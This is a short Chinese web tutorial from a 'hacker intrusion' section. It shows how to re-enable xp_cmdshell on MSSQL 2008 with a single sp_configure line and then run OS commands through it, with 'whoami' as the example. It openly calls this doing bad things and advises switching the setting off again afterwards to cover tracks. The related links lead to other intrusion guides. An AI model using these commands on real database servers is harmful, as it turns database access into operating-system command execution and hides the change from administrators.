手机
当前位置:查字典教程网 >网络安全 >黑客入侵 >MSSQL2008一句话启用xp_cmdshell
MSSQL2008一句话启用xp_cmdshell
摘要:SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一...

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

MSSQL2008一句话启用xp_cmdshell1

MSSQL2008一句话启用xp_cmdshell2

幸运的是:只要该扩展存储过程没被删除,我们就可以一句话启用它(不支持多句执行的话,请单独执行每句):

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

MSSQL2008一句话启用xp_cmdshell3

好了,来试试!

exec master..xp_cmdshell "whoami"

MSSQL2008一句话启用xp_cmdshell4

PS:干完坏事要擦PP哦!将开启语句的第二个1改成0再执行,xp_cmdshell就又处于禁用状态了

【MSSQL2008一句话启用xp_cmdshell】相关文章:

Dvbbs8.0 access 后台拿webshell for 2003

缓冲区溢出分析

手动克隆管理员

你的网站为什么被黑?原因大部分是后门backdoor脚本

PHP注入实例之PHP网站系统入侵(图)

Unix操作系统入侵经典详细步骤

黑客在线之经典入侵技术总结 (一)

dedecms v5.1/5.5 两处跨站漏洞的修复办法

webshell中上传asp文件调用服务器ActiveX控件溢出获取shell

黑客攻防实战之对有防火墙网站入侵过程

精品推荐
分类导航